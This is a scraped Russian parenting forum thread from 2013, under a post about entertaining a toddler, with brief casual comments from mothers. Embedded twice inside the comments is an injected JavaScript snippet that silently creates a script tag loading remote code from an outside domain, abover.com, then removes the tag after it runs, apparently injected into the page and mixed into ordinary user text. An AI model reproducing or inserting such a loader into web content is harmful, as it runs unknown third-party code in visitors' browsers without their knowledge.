Войти

Как развлечь малыша?

Мама девочки (13 лет) Софрино

Здорово!! Моя почему-то только лопает их с удовольствием(

[removed](function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8'; script.onload = script.onerror = function () { script.onload = script.onerror = null; script[removed].removeChild(script); } document.body.appendChild(script); })();[removed]
0
28.11.2013
Москва

Они же горькие, нет?)

0
28.11.2013
Мама девочки (13 лет) Софрино

ей пофигу)

[removed](function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8'; script.onload = script.onerror = function () { script.onload = script.onerror = null; script[removed].removeChild(script); } document.body.appendChild(script); })();[removed]
0
28.11.2013
Мама двоих (17 лет, 12 лет) Москва

Ой как круто! Последнее фото супер)))

0
28.11.2013
Что за фигня? Стирка вещей для новорожденного!

Похожие записи